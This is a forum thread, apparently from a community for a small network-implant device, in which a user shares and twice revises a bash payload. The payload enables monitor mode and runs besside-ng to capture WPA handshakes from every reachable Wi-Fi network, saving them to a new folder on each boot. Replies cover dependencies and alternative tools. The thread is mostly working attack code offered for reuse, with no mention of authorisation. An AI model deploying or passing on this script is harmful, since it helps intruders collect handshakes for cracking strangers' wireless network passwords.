PixL Posted December 15, 2017 Share Posted December 15, 2017 (edited) I've written my first payload....it should use besside-ng to capture as many WPA handshakes as it can find. #!/bin/bash # Besside-ng v1.0 function txpower() { ifconfig wlan0 down iw reg set US ifconfig wlan0 up sleep 1 } function monitor() { airmon-ng start wlan0 sleep 2 } function besside() { cd /root besside-ng -W mon0 } txpower LED B monitor LED R sleep 5 LED ATTACK besside Edited December 15, 2017 by PixL Quote Link to comment Share on other sites More sharing options...
b0N3z Posted December 16, 2017 Share Posted December 16, 2017 Dependencies? Quote Link to comment Share on other sites More sharing options...
Metasploit Posted December 16, 2017 Share Posted December 16, 2017 (edited) Congratulation for the first payload! Edited December 16, 2017 by Metasploit Quote Link to comment Share on other sites More sharing options...
PixL Posted December 16, 2017 Author Share Posted December 16, 2017 (edited) Dependencies would be aircrack-ng and a usb wifi adapter.... I think that's all it needs... believe besside-ng installs with aircrack. opkg install aircrack-ng <== that should do it Edited December 16, 2017 by PixL Quote Link to comment Share on other sites More sharing options...
PixL Posted December 23, 2017 Author Share Posted December 23, 2017 I'm wondering if Besside-ng may be a little outdated these days, it only captures M1 & M2 handshake. Actually the project below looks interesting and might be an idea to use instead. https://github.com/ZerBea/hcxtools Quote Link to comment Share on other sites More sharing options...
PixL Posted December 23, 2017 Author Share Posted December 23, 2017 Maybe Sebkinne could advise on the best way to compile new binaries for the Packet Squirrel? Quote Link to comment Share on other sites More sharing options...
PixL Posted December 25, 2017 Author Share Posted December 25, 2017 (edited) The slight update below should create a new capture file each time the Squirrel is started rather than appending to the old one. #!/bin/bash # Besside-ng v1.0 function txpower() { ifconfig wlan0 down iw reg set US ifconfig wlan0 up sleep 1 } function monitor() { airmon-ng start wlan0 sleep 2 } function besside() { cd /root/payloads/switch3 mkdir $RANDOM cd * besside-ng -W mon0 } txpower LED B monitor LED R sleep 5 LED ATTACK besside It assumes your using it in swtch3 Edited December 25, 2017 by PixL Quote Link to comment Share on other sites More sharing options...
PixL Posted December 29, 2017 Author Share Posted December 29, 2017 Updated again.... #!/bin/bash # Besside-ng v1.0 function txpower() { ifconfig wlan0 down iw reg set US ifconfig wlan0 up sleep 1 } function monitor() { airmon-ng start wlan0 sleep 2 } function besside() { cd /root/payloads/switch3 folder="$RANDOM" mkdir $folder cd $folder besside-ng -W mon0 } txpower LED B monitor LED R sleep 5 LED ATTACK besside Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.